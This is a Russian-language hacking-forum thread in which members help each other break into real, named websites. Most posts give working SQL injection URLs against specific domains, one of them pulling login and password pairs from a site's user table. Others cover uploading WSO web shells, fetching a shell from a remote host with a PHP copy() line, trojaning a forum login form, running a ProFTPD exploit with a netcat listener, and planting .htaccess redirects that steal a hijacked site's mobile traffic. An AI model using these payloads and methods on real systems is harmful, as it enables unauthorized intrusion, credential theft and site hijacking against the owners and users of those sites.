M_script said:
muljtik
, найди на сайтах папки с правами на запись и выполнение, залей туда шеллы.
Если крупные сайты, можно поискать баги в скриптах.



Да, на некоторых доменах в не которые папки есть возможность залить шелл, но всё равно когда захожу на только что залитый шелл им нельзя править индексную страницу...

хочу получить полный доступ к серверу но не знаю как, выполнил пару команд

$ uname -a

Linux cpanel12.per.syra.net.au 2.6.18-274.7.1.el5 #1 SMP Thu Oct 20 16:21:01 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux

$ cat /etc/redhat-release

CentOS release 5.7 (Final)

поискал сплойт на exploit-db.com, без успешно

2muljtik,

2.6.18-274.7.1.el5

под него нет пока сплойтов(мб и есть).

Попробуй прочитать конфиги других сайтов, узнать пароль и уже из админки тех сайтов заливать шелл.

Ereee said:
Попробуй прочитать конфиги других сайтов, узнать пароль и уже из админки тех сайтов заливать шелл.



будет ли разница если я залью шелл через админку или через шелл на другом сайте найду папку с правами на загрузку файлов и залью туда другой шелл

muljtik said:
будет ли разница если я залью шелл через админку или через шелл на другом сайте найду папку с правами на загрузку файлов и залью туда другой шелл


да нет смысла лить шеллы....только рутать, чего невозможно...

muljtik said:
будет ли разница если я залью шелл через админку или через шелл на другом сайте найду папку с правами на загрузку файлов и залью туда другой шелл


Бывали случаи... Иногда льется не под 80/apache.

http://esus.ru/php/content.php?id=2775+union+select+1,2,3,4,5,6,7,8,9 ,10,1,2,3,4,5,6,7,8,9--

помогите вывести столбцы, или это blind?? хотя хавидж не определил что блайнд поэтому и обращяюсь

pirat0 said:
http://esus.ru/php/content.php?id=2775+union+select+1,2,3,4,5,6,7,8,9 ,10,1,2,3,4,5,6,7,8,9--
помогите вывести столбцы, или это blind?? хотя хавидж не определил что блайнд поэтому и обращяюсь


это слепая инъекция.

kravch_v said:
это слепая инъекция.


ах, точняк сиптом погнал, поспешил с вопросом, спс

Такой вопрос, подобрал столбцы, версию и тп выыводит нормально, при попытке вывести данние таблиц выводит ошибку


http://www.europeeye.ro/detalii?id=7+union+select+1,2,3,table_name,5,6+fro m+information_schema.tables+limit+0,1--+


почему?

Code:
http://www.europeeye.ro/detalii?id=7+union+select+1,unhex(hex(table_name)) ,3,4,5,6+from+information_schema.tables+--+

Можно ли как-то использовать данные уязвимости?

http://s017.radikal.ru/i414/1202/3c/84386a6b61d7.jpg

2Tr[1]x,

Можно.

P.S. Что за прога?

Ereee said:
2Tr[1]x
,
Можно.
P.S. Что за прога?


программа Xspider

Ereee, не подскажешь как именно?

x"]
Tr[1]x said:
Ereee
, не подскажешь как именно?


Обычно сканеры показывают CVE. По нем ищи сплойт в гугле.

ТАксс, пару вопросов


http://kvikmyndir.is/frettir/frett/?id=104374


не могу вывести данные через еррор, кто что подскажет

второе


http://www.eeagrants.lv/?id=-10+limit+0,0+union+select+version%28%29,version%28 %29,version%28%29--+




http://crumbweb.org/getInterviewDetail.php?id=-11+limit+0,0+union+select+version%28%29,version%28 %29,version%28%29--+


в обоих случаях стольбы подобрал но на екран ничего не выводит, крутить как блинд не избежно или всётаки ожно чтонибуть сделать?

и наконец третее


http://www.57productions.com/article_reader.php?id=11


что в запрос не подставлю постоянно вылетает только ошибка и никакого вывода, как быть?

qaz,

третье - слепая

вторая - слепая, попробуй что-нибудь сделать.

qaz

первый

http://kvikmyndir.is/frettir/frett/?id=104374,(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))--+

второй наверное слепая

3

http://www.57productions.com/article_reader.php?id=11+or+1+group+by+concat(vers ion(),floor(rand(0)*2))having+min(0)+or+1--+

третья ветка, поэтому юнион не катит

Konqi said:
qaz
первый
http://kvikmyndir.is/frettir/frett/?id=104374,(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))--+


о, спасибо, вот прблемка, хотел перебрать таблици, на какой бы лимит не подставил серовно показывает одну и туже таблицу


http://kvikmyndir.is/frettir/frett/?id=104374,%28select%201%20from%28select%20count%2 8*%29,concat%28table_name,0x00,floor%28rand%280%29 *2%29%29x%20from%20information_schema.tables%20gro up%20by%20x%20limit%202,1%29a%29%29--+


может я не туда его влепил?

qaz said:
о, спасибо, вот прблемка, хотел перебрать таблици, на какой бы лимит не подставил серовно показывает одну и туже таблицу
может я не туда его влепил?


http://kvikmyndir.is/frettir/frett/?id=104374,(select 1 from(select count(*),concat((select+table_name+from+informatio n_schema.tables+where+table_schema=database()+limi t+0,1),floor(rand(0)*2))x from information_schema.tables group by x)a))--+

Выпилил следующую БД,но limit отказывается работать.Как в таком случае данные выбрать ?

-id+union+select+table_name,2,3+from+information_sc hema.tables

Выдаёт одну запись.Всё.

Забыл добавить,что никаких ошибок аля *OLE DB Driver *не выводится.

system_user не sa,к сожалению = )


Code:
[Microsoft SQL Server 2005

Breetonia said:
Выпилил следующую БД,но limit отказывается работать.Как в таком случае данные выбрать ?
-id+union+select+table_name,2,3+from+information_sc hema.tables
Выдаёт одну запись.Всё.
Забыл добавить,что никаких ошибок аля *OLE DB Driver *не выводится.
system_user не sa,к сожалению = )

Code:
[Microsoft SQL Server 2005



not in

Спасибо,реально забыл )

Вечер в хату, господа. Залил шелл(WSO) на сервер одного форума(vb) и хотел было протроянить форму логина, но не могу править/удалить/заменить файл login.php - выдаёт ошибку "File isn't writeable"(через консоль тоже не прокатывает). Причём любой другой файл могу править, создавать файлы/папки в любом месте. Подскажите в какую сторону копать.

ОС Windows Server 2008 R2 Web Server Edition SP1. IIS/7.5.

Chmod-ить пробовал?

P.S. Если файл не правится и не чмодится, но в эту папку льются другие файлы:

1) Скачай login.php

2) Удали login.php с сервера

3) Загрузи скачанный файл login.php

4) Профит, все будет правится =)

Ereee said:
Chmod-ить пробовал?
P.S. Если файл не правится и не чмодится, но в эту папку льются другие файлы:
1) Скачай login.php
2) Удали login.php с сервера
3) Загрузи скачанный файл login.php
4) Профит, все будет правится =)


Chmod не прокатывает, а login.php не могу удалить, заменить тоже.

Code:
Warning: fopen(./structure/http://some-inexistent-website/some_inexistent_file_with_long_name/0.php) [function.fopen]: failed to open stream: No such file or directory in /homepages/34/d233637692/htdocs/modules/toload/structure/functions.php on line 37

,

это выплюнул сканнер, ошибка file inclusion, только не понятно вот это - fopen(./structure/http://some-inexistent-website/some_inexistent_file_with_long_name/0.php), это что получяется что скачиваемый файл должен иметь длинное имя чтоль??

pirat0 said:

Code:
Warning: fopen(./structure/http://some-inexistent-website/some_inexistent_file_with_long_name/0.php) [function.fopen]: failed to open stream: No such file or directory in /homepages/34/d233637692/htdocs/modules/toload/structure/functions.php on line 37

,
это выплюнул сканнер, ошибка file inclusion, только не понятно вот это - fopen(./structure/http://some-inexistent-website/some_inexistent_file_with_long_name/0.php), это что получяется что скачиваемый файл должен иметь длинное имя чтоль??


Скрипт не может определить правильные директории для подключения необходимых файлов. (Такого файла или директории - не существует).

http://www.edu.ru/index.php?page_id=50&op=word&wid=509+order+by+4--+


Никак дальше union+select не хочет выполнятся.

Здравствуйте!

Ломанул булку, шелл залить понятия как не имею.

Слышал про стили, но не могу найти шелла в формате xml.

Помогите пжлста, наведите хотя бы на ссылку какую нибудь. Заранее благодарен!

Версия булки 4.0.х

Пост пжлста не удаляйте!

Реально ли как-то обойти такого рода функцию проверки расширений файлов и залить скажем исполняемый файл?

[PHP]
PHP:
[COLOR="#0000BB"]if(!empty($upload)){

$errore='';

for($i=1;$i[COLOR="#007700"]

Привет, нашел в сервер

220 ProFTPD 1.3.2e Server (ProFTPD)

Система UNIX, ну вот ехploit нашел такой www.exploit-db.com/exploits/15449/

У меня ест ТП-Линк - я там поставил виртуал сервер

ID Service Ports IP Address Protocol Status

1 45295 192.168.1.100 ALL Enabled

чтобы работала порт, тогда с netcat открыл тот порт через cmd.

C:\nc>nc -lvp 45295

listening on [any] 45295 ...

ладно тогда открываю новы cmd и запускаю перл ехплоит.

Ничего не происходит, я все сделал правильна? Если я чекаю тот порт например, тогда он закрывается, показывает кто чекал.

Если все сделал правильно тогда проста там все ок?

Здравствуйте!
Ломанул булку, шелл залить понятия как не имею.
Слышал про стили, но не могу найти шелла в формате xml.
Помогите пжлста, наведите хотя бы на ссылку какую нибудь. Заранее благодарен!
Версия булки 4.0.х
Пост пжлста не удаляйте!


первое что попалось - http://www.youtube.com/watch?v=k9xe55gq2fc

уверен, на ачате есть еще способы, стоит только посмотреть внимательней


Никак дальше union+select не хочет выполнятся.


как вариант можно крутить как слепую инъекцию


Code:
http://www.edu.ru/index.php?page_id=50&op=word&wid=509+and+substring%28version%28%29,1,1%29=5--+

как вариант можно крутить как слепую инъекцию

Code:
http://www.edu.ru/index.php?page_id=50&op=word&wid=509+and+substring%28version%28%29,1,1%29=5--+





http://www.edu.ru/index.php?page_id=50&op=word&wid=509++and+555=if%28ord%28lower%28mid%28%28selec t+table_name+from+information_schema.tables+limit+ 0,1%29,1,1%29%29%29%3E=1,555,777%29--+


на слепую ругаеться, видимо слишком длинные запросы не проходят.

Code:
http://forum.prodom.ru/viewtopic.php?p=3805'

не выходит раскрутить.

http://forum.prodom.ru/viewtopic.php?p=3805/**/and/**/1=1/* true

http://forum.prodom.ru/viewtopic.php?p=3805/**/and/**/1=0/* true

Думаю нет скульи.

www.ctgroup.kz/?op=mi=node_2566=,view_2599

дальше одного столбца не продвинулся что не так?

infoseller said:
www.ctgroup.kz/?op=mi=node_2566=,view_2599
дальше одного столбца не продвинулся
что не так?


Там нет инъекции.

Ereee said:
Там нет инъекции.


Почему ты так решил?

nemaniak, нереально.


PHP:
strrchr(${'name'.$i.'_name'},".")==".doc"

strrchr берет все после точки. Eсли будет shell.php%00.jpg, shell.php.jpg, то на проверку идет:

php%00.jpg

php.jpg

И проверку не пройдет. Как то так.

HAXTA4OK,

http://www.ctgroup.kz/?op=mi=node_2566=,view_2599+and+1=1 false

http://www.ctgroup.kz/?op=mi=node_2566=,view_2599+and+1=0 false

не?

Ereee

http://www.ctgroup.kz/?op=mi=node_2744' and 2>5+--+=,view_2599 False

http://www.ctgroup.kz/?op=mi=node_2744' and 2>1+--+=,view_2599 True

не??

Главное = не юзать

HAXTA4OK,

спасибо, незнал. А почему:

http://www.ctgroup.kz/?op=mi=node_2744' and substring(version(),1,1)>1+--+=,view_2599

false? Не могу понять...

P.S. Думаю на фильтры... Хотя... нет.

Нужно копать в сторону второго запроса


http://www.ctgroup.kz/?op=mi='+/*!uNiOn*//*!select*/'node_2744\'+and+\'1'+--+=,view_2599


Вывод где-то рядом

На самой странице результаты могут быть не видны. Ищите в исходнике по тексту


PHP:
$(".l").hide(1);

Всем хай, вот не могоу раскрутить скулу, вобще возможно ли провести тут sqli или нет если да то каким запросом.

http://www.mk.gov.kz/?lang=kaz&id_open_rubric=806'

disable_functions dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit, chown, chgrp


у меня есть шансы на заливку?

2Ereee, ну да, только как

anonym_di,

фильтры фильтры...

faza02,

шансы всегда есть =)

faza02 said:
у меня есть шансы на заливку?
2Ereee, ну да, только как



Залить то зальешь, правда криво шелл может будет работать

на этом сервере еще есть сайты, стоит их копать, или конфиг везде такой будет?

faza02 said:
на этом сервере еще есть сайты, стоит их копать, или конфиг везде такой будет?


Везде такой. WSO будет нормально пахать, правда не порутаешь.

хорошо, спасибо.

а какие еще функции есть, которые не выключены, и через которые можно залить?

faza02 said:
хорошо, спасибо.
а какие еще функции есть, которые не выключены, и через которые можно залить?


так ты что на данный момент имеешь?

disable_functions dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit, chown, chgrp
allow_url_fopen On


вот, залить могу что угодно

faza02 said:
вот, залить могу что угодно


я к тому что откуда ты эту инфу берешь, у тебя евал там?

админка вб, выполнение пхп кода через модули

ну так заливай, в чем проблема, я тебя понять не могу...

если ты о том как заливать, то один из вариантов

copy('http://site.ru/shell.txt','/papka/s/npoBaMu/Ha/3anucb/6e3naleBashell.php');

если ты о том что за папка с правами на запись, то найди в пхпхинфо DOCUMENT_ROOT там будет путь к site.ru если у тебя форум в папке site.ru/forum/ то припишешь к этому пути /forum/ ну а там уже сам думай в какую папку лить, ищи которая на запись доступна

Лучше сразу код пакованного WSO вставь. Дальше спокойно посмотришь, где доступно для записи, где нет и зальеш в уютное местечко =)

james00x said:
Привет, нашел в сервер
220 ProFTPD 1.3.2e Server (ProFTPD)
Система UNIX, ну вот ехploit нашел такой www.exploit-db.com/exploits/15449/
У меня ест ТП-Линк - я там поставил виртуал сервер
ID Service Ports IP Address Protocol Status
1 45295 192.168.1.100 ALL Enabled
чтобы работала порт, тогда с netcat открыл тот порт через cmd.
C:\nc>nc -lvp 45295
listening on [any] 45295 ...
ладно тогда открываю новы cmd и запускаю перл ехплоит.
Ничего не происходит, я все сделал правильна? Если я чекаю тот порт например, тогда он закрывается, показывает кто чекал.
Если все сделал правильно тогда проста там все ок?


Я делаю все правильно? Потому что я нашел еще 2 сервера. Другие версии других операционных систем, но ничего не меняется. Но exploit показано, что ходить в их версии.

Заранее спасибо.

ребят, подскажите где можна почитать про уязвимость в поле search?

pirat0 said:
ребят, подскажите где можна почитать про уязвимость в поле search?


поле 'search' ничем не отличается от 'уязвимости' id. Это просто мегап****ц вопрос. Никогда в этой теме так никому не говорил, но тут порвало шаблон. НАПИШИ КАКОЕ-НИТЬ подобие сайта из двух страниц и базы, чтобы не задавать таких вопросов.

pirat0 said:
ребят, подскажите где можна почитать про уязвимость в поле search?


разве это новая категория уязвимостей?

чаще всего там бывает xss или sqli, sqli из за недостаточной фильтрации входящих данных, которые используются вместе с оператором LIKE

Melfis +1

подскажите, при RFI подставляю http://ya.ru/ все норм, грузится яшка, далее подставляю http://site.ru/shell.txt - пустая страница в сорце весь код есть, http://site.ru/shell.php - открывает шелл на моем сайте, что еще можно попробывать??

p.s. когда подгружаю с http://files.xakep.biz/shells/PHP/ одни крокозяблы

при добавлении ? в конец адреса - пустая страница

Может просто ифрейм?

что можете сказать или лучше посоветовать?


Code:
_ww.9_months.ru/vote/24'

Спасибо.

Always said:
что можете сказать или лучше посоветовать?

Code:
_ww.9_months.ru/vote/24'

Спасибо.


Ссылку нормально дай.

Always said:

PHP:
www.9months.ru/vote/24'



вот версию вывел а дальше хз.

http://www.9months.ru/vote/25-1'and(select*from(select(name_const(version(),1)), name_const(version(),1))a)and'

нужна помощь великих и могучих))


Code:
Duplicate column name '5.0.86-log'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/home/9months/data/www/9months.ru/vote.php on line 195
нет такого опроса

Немогу вывести инфу через контактацию с ошибком, помогите составить запрос


http://www.dunloptyres.ru/tyre.php?id=3+or+1+group+by+concat%28%28select+ver sion%28%29%29,0x00,floor%28rand%280%29*2%29%29havi ng+min%280%29+or+1--+

qaz said:
Немогу вывести инфу через контактацию с ошибком, помогите составить запрос


гы, я тоже с этим сайтом в прошлом парился)))

вот

http://www.dunloptyres.ru/tyre.php?id=3+and(select+count(*)+from+information _schema.tables+group+by(concat(version(),0x00,floo r(rand(0)*2))))--+


Code:
AND b.id=a.tyre_type_id [nativecode=1062 ** Duplicate entry '5.0.87-community' for key 1]
Array

Достаю пассы через скулю с БД, но проблема с кодировкой

пассы на кирилице выглядят дdЭеѓj(¤хWnжnѓ»

как бороться ?

точнее это не с кодировкой проблемы это так пасы шифруються .

Вот пример нескольких паролей


c⧱uКч"‡Bњn
dс\ ґЃJК.я-йј
ЛXЫ l[Ж RЂNяїџъ
ХzWt9:fЗРЭh.G


У всех по 16 символов , но что это такое ? есть у кого идеи каким макаром оно зашифоровано?

sl1k said:
Достаю пассы через скулю с БД, но проблема с кодировкой
пассы на кирилице выглядят дdЭеѓj(¤хWnжnѓ»
как бороться ?


ascii, hex

16 символов навело на мысль что это sql хеш , но че он в таком странном виде?

Подскажите кто нибудь хоть что-то плз .

sl1k said:
16 символов навело на мысль что это sql хеш , но че он в таком странном виде?
Подскажите кто нибудь хоть что-то плз .


а у тебя случяйно не blind injection??

ivan151 said:
есть ли запрос чтобы не юзать постоянно лимит(я о такой конструкции union+select+1,2,3,4,table_name+from+information_s chema.tables+limit+1,1) а что-бы вывести все таблицы с одного поля или нескольких,просто есть всего 2 поля


есть - union+select+1,2,3,4,group_concat(table_name)+from +information_schema.tables+where+table_schema='и� �я database()'

но вывести можго только 1024 символа

В общем так, есть сайт, и при site.com/lol.php?id=1' выдаётся ошибка mysql_fetch_object(), и кавычка экранируется как \' ...

а при /**/order/**/by/**/9999-- и т.п еррора нету, думал что запрос обрамлён в кавычки, но видимо не так, так как другим раскрутить удалось, собственно, какие идеи?

P.S Error-based тоже юзал..

pirat0 said:
есть - union+select+1,2,3,4,group_concat(table_name)+from +information_schema.tables+where+table_schema='и� �я database()'
но вывести можго только 1024 символа


юзай mid()

а вообще LIMIT бы не мешало сначала

Есть идеи как нибудь раскрутить это?


http://www.datingtop.net/index.php?id=10'

pirat0 said:
а у тебя случяйно не blind injection??


нет через обычный union вывожу.

c⧱uКч"‡Bњn

dс\ ґЃJК.я-йј

ЛXЫ l[Ж RЂNяїџъ

ХzWt9:fЗРЭh.G

JyM·B>ґ

TYPUCT said:
Есть идеи как нибудь раскрутить это?


http://www.datingtop.net/index.php?id=10+and(select+count(*)+from+informati on_schema.tables+group+by(concat(version(),0x00,fl oor(rand(0)*2))))--+


Code:
Duplicate entry '5.0.92-community' for key 1

[QUOTE="sl1k"]
sl1k said:
нет через обычный union вывожу.
c⧱uКч"‡Bњn
dс\ ґЃJК.я-йј
ЛXЫ l[Ж RЂNяїџъ
ХzWt9:fЗРЭh.G
JyM·B>ґґ

pirat0 said:
ты руками выводиш или прогой??


и руками и прогой

ivan151 said:
есть ли запрос чтобы не юзать постоянно лимит(я о такой конструкции union+select+1,2,3,4,table_name+from+information_s chema.tables+limit+1,1) а что-бы вывести все таблицы с одного поля или нескольких,просто есть всего 2 поля


select concat(@i:=0,@a:=0x3a,benchmark(666,@a:=concat(@a, 0x3a,(select @i:=table_name from information_schema.tables where table_name>@i limit 1))),@a)

где 666 - кол-во строк не более максимального значения в таблице.

ivan151 said:
вобщем вот сайт http://1liceum.ru/shownew.php?setid=-1+union+select+1,2,3,4,5--
всего для вывода 2 поля,ну допустим юзаю лимит и таким запросом http://1liceum.ru/shownew.php?setid=-1+union+select+1,2,3,4,table_name+from+information _schema.tables+limit+0,1 пытаюсь узнать имена таблиц(мне нужны данные пользователей) и меняя лимит выводит другие таблицы вот например там есть:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
answer
но в какой таблице данные пользователей и как их вытащить? и ещё можно ли тут использовать ' UNION SELECT TOP 1 login FROM users-- и если да то как это должно выглядеть?


может лучше почитать мануал (https://antichat.live/threads/43966/)?

там все популярно расписано...

Всем Хай, вот есть сайт

http://www.lingvoinfo.com/?link=-115/*+union+select+,1,2,3,4*/ => при таком запросе у меня почему-то выводит число 0 как можно провести SQLi ???

anonym_di said:
Всем Хай, вот есть сайт
http://www.lingvoinfo.com/?link=-115/*+union+select+,1,2,3,4*/ => при таком запросе у меня почему-то выводит число 0 как можно провести SQLi ???


http://www.lingvoinfo.com/?link=115+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,version(),19,20,21,22,23,24,25,26+--+ вот так нужно

pirat0 said:
http://www.lingvoinfo.com/?link=115+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,version(),19,20,21,22,23,24,25,26+--+ вот так нужно


как ты узнал кол-во табл??

Смотри, там у тебя два запроса.

http://www.lingvoinfo.com/?link=115+ORDER+by+25 false+true

http://www.lingvoinfo.com/?link=115+ORDER+by+27 false+false

http://www.lingvoinfo.com/?link=115+ORDER+by+26 false+true

Соответственно, кол-во = 26.

anonym_di said:
как ты узнал кол-во табл??




Ereee said:
Смотри, там у тебя два запроса.
http://www.lingvoinfo.com/?link=115+ORDER+by+25 false+true
http://www.lingvoinfo.com/?link=115+ORDER+by+27 false+false
http://www.lingvoinfo.com/?link=115+ORDER+by+26 false+true
Соответственно, кол-во = 26.


амне показалось фильтрация идет

http://www.lingvoinfo.com/?link=115/**/order/**/by/**/26+--+ true

http://www.lingvoinfo.com/?link=115/**/order/**/by/**/27+--+ false

Помогите со скулёй, чёт никак не выходит


http://www.porsche-spb.ru/model.phtml?id=13

qaz said:
Помогите со скулёй, чёт никак не выходит




Code:
http://www.porsche-spb.ru/model.phtml?id=9999999+union+select+1,2,3,concat_w s%280x3a,user%28%29,database%28%29,version%28%29%2 9,5,6,7--+

porsche_main@localhostorsche_main:5.5.19

Вроде все стандартно...

граждане, вопрос такой, есть шелл, нашол root конфиг бд пароль и логин, коннектился root-ом к базе пару недель назад все гуд, а сейчас пишет Access denied for user 'root'@'localhost' (using password: YES), думал пароль сменили, проверил - нет, таже связка логина и пароля, вопрос - в чем прикол??

p.s. если конекчюсь не рутом, все норм, коннект происходит

такой вопрос, подобрал колонки


http://www.esoterica.ru/materials.php?id=13+limit+0,0+union+select+1,2,3,4 ,version%28%29,6,7--+


но при попытке вывода инфы вылитает ошибка, как быть?

qaz said:
такой вопрос, подобрал колонки
но при попытке вывода инфы вылитает ошибка, как быть?


http://www.esoterica.ru/materials.php?id=13+limit+0,0+union+select+1,2,3,4 ,unhex(hex(version())),6,7--+

qaz, почитайте мануал от Dr.Z3r0, понадобится

Konqi said:
http://www.esoterica.ru/materials.php?id=13+limit+0,0+union+select+1,2,3,4 ,unhex(hex(version())),6,7--+
qaz
, почитайте мануал от
Dr.Z3r0
, понадобится


Также можно использовать binary().

Вопрос по WAP

Лью траффик в одной партнерке на загрузку Skype, вписывал такой код в .htaccess

RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone) [NC]

RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigab ot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|o oyyo|pagebull|scooter|w3c_validator|jigsaw|webalta |yahoofeedseeker|mmcrawler|yandexbot|yandeximages| yandexvideo|yandexmedia|yandexblogs|yandexaddurl|y andexfavicons|yandexdirect|yandexmetrika|yandexcat alog|yandexnews|yandeximageresizer) [NC]

RewriteRule (.*) http://site.com/skype/2222/skype.auto [L,R=302]

Трафф шел без проблем, но позавчера админ заметил код и что он мог сделать не пойму, код в .htaccess сохраняется а трафф не идет, как он cмог отрубить мобильный трафф?

PS : Раньше он шеллы искал и удалял, а сейчас даже не ищет

er9j6@,

как вариант, сайт был перенесен на другой сервер.

Ereee said:
er9j6@
,
как вариант, сайт был перенесен на другой сервер.


Код на загрузку Skype, можно как-то вписать на php в двиг CMS?

Moriarty said:
это же космический ...дец!
ну чуть ниже! на 10-15 пикселей ниже твоего хтаксес кода(в промо разделе пиратов)! совсем на чуть чуть! находится js-код который делает тоже самое, дружище! удачи!
а вообще проверь id суббака! скорей это не админ, а кто то трафф тырит!
зы. и с чьего же ты благословения на скайп то льешь...


Привожу полностью файл .htacess, js-код я не нашел

RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone) [NC]

RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigab ot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|o oyyo|pagebull|scooter|w3c_validator|jigsaw|webalta |yahoofeedseeker|mmcrawler|yandexbot|yandeximages| yandexvideo|yandexmedia|yandexblogs|yandexaddurl|y andexfavicons|yandexdirect|yandexmetrika|yandexcat alog|yandexnews|yandeximageresizer) [NC]

RewriteRule (.*) http://site.com/skype/2222/skype.auto [L,R=302]

RewriteEngine on

RewriteCond $1 !^(robots\.txt)

RewriteCond %{HTTP_HOST} ^site.ru|mail.site.ru|pop.site.ru|smtp.site.ru|ftp .site.ru|old.site.ru$

RewriteRule ^(.*)$ http://www.site.ru/$1 [NC,R=301,L]

#RewriteCond %{REQUEST_FILENAME} shop2.*

#RewriteRule . index-yii.php [QSA,L]

RewriteCond %{REQUEST_FILENAME} scheme2.*

RewriteRule . index-yii.php [QSA,L]

#проверка существоания файла:

RewriteCond %{REQUEST_FILENAME} !-f

#проверка существования директории

RewriteCond %{REQUEST_FILENAME} !-d

#если не то не другое не сработало, передается к скрипту

RewriteRule ^(.*)$ art_content.php?$1 [QSA,L]

AddType application/x-httpd-php .css .shtml

#php_flag log_errors On

#php_flag display_errors Off

#php_value error_reporting "E_ALL"

Moriarty said:
это же космический ...дец!
ну чуть ниже! на 10-15 пикселей ниже твоего хтаксес кода(в промо разделе пиратов)! совсем на чуть чуть! находится js-код который делает тоже самое, дружище! удачи!
а вообще проверь id суббака! скорей это не админ, а кто то трафф тырит!
зы. и с чьего же ты благословения на скайп то льешь...


А куда он это код мог вписать, в index.php его нет?

Code:
AddType application/x-httpd-php .css .shtml

Подозрительно ^.

PHP/Javascript-редирект сделать легко.

Пример PHP:


PHP:
if ($version!="desktop") {

$useragent=$_SERVER['HTTP_USER_AGENT'];

if(preg_match('/android|avantgo|blackberry|blazer|compal|elaine|fe nnec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|opera m(ob|in)i|palm( os)?|phone |p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link )|vodafone|wap|windows (ce|phone)|xda|xiino/i',$useragent)||preg_match('/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar (ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|b r(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a |jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|e\-|e\/|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|d o|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran |owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|t cl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(4 0|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98 )|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|xda(\-|2|g)|yas\-|your|zeto|zte\-/i',substr($useragent,0,4)))

header('Location: http://TRAFF');

}

Javascript:


Code:

ivan151 said:
не поможите таблицу с данными админа найти,просто на сайте как таковых пользователей нет т.к там нет ничего(ни форума ни каких-то отзывов ну и ничего,для чего собственно и регестрируются люди) но на главной странице есть форма входа при нажатии "вход" с пустыми полями ведёт на /admin/index.php судя по всему админка,ну значит и таблица с данными должна быть вот сайт http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,table_NAME,3,4,5+FROM+INFORMATION _SCHEMA.tables+limit+0,1


http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,group_concat(login,0x3a,password) ,3,4,5+from+lsh_infousers+--+

Как узнать в ProFTPD, включен или выключен mod_sql?

Я слышал, что это exploit http://www.exploit-db.com/exploits/15449/ не работает при включении mod_sql или наоборот.

ivan151 said:
